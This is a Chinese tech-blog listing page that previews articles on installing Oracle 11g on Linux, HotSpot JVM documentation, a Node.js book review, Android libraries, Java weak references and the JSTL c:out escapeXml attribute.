    linux系统下的oracle安装 本文档是Linux(redhat6.x、centos6.x、redhat7.x) 64位操作系统安装Oracle 11g(Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production),本文基于各种网络资料精心整理而成,共享给有需要的朋友。如有问题可联系:QQ:52-7
  • hotspot虚拟机 leichenlei javaHotSpotjvm虚拟机文档
    JVM参数  http://docs.oracle.com/javase/6/docs/technotes/guides/vm/index.html   JVM工具 http://docs.oracle.com/javase/6/docs/technotes/tools/index.html   JVM垃圾回收 http://www.oracle.com
  • 读《Node.js项目实践:构建可扩展的Web应用》 ——引编程慢慢变成系统化的“砌砖活” noaighost Webnode.js
    读《Node.js项目实践:构建可扩展的Web应用》 ——引编程慢慢变成系统化的“砌砖活” 眼里的Node.JS 初初接触node是一年前的事,那时候年少不更事。还在纠结什么语言可以编写出牛逼的程序,想必每个码农都会经历这个月经性的问题:微信用什么语言写的?facebook为什么推荐系统这么智能,用什么语言写的?dota2的外挂这么牛逼,用什么语言写的?……用什么语言写这句话,困扰人也是阻碍
  • 快速开发Android应用 rensanning android
    Android应用开发过程中,经常会遇到很多常见的类似问题,解决这些问题需要花时间,其实很多问题已经有了成熟的解决方案,比如很多第三方的开源lib,参考 Android Libraries 和 Android UI/UX Libraries。 编码越少,Bug越少,效率自然会高。 但可能由于 根本没听说过、听说过但没用过、特殊原因不能用、自己已经有了解决方案等等原因,这些成熟的解决
  • 理解Java中的弱引用 tomcat_oracle java工作面试
     不久之前,我 面试了一些求职Java高级开发工程师的应聘者。我常常会面试他们说,“你能给我介绍一些Java中得弱引用吗?”,如果面试者这样说,“嗯,是不是垃圾回收有关的?”,我就会基本满意了,我并不期待回答是一篇诘究本末的论文描述。   然而事与愿违,我很吃惊的发现,在将近20多个有着平均5年开发经验和高学历背景的应聘者中,居然只有两个人知道弱引用的存在,但是在这两个人之中只有一个人真正了
  • 标签输出html标签" target="_blank">关于标签输出html标签 xshdch jsp
    http://back-888888.iteye.com/blog/1181202 关于<c:out value=""/>标签的使用,其中有一个属性是escapeXml默认是true(将html标签当做转移字符,直接显示不在浏览器上面进行解析),当设置escapeXml属性值为false的时候就是不过滤xml,这样就能在浏览器上解析html标签, &nb
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他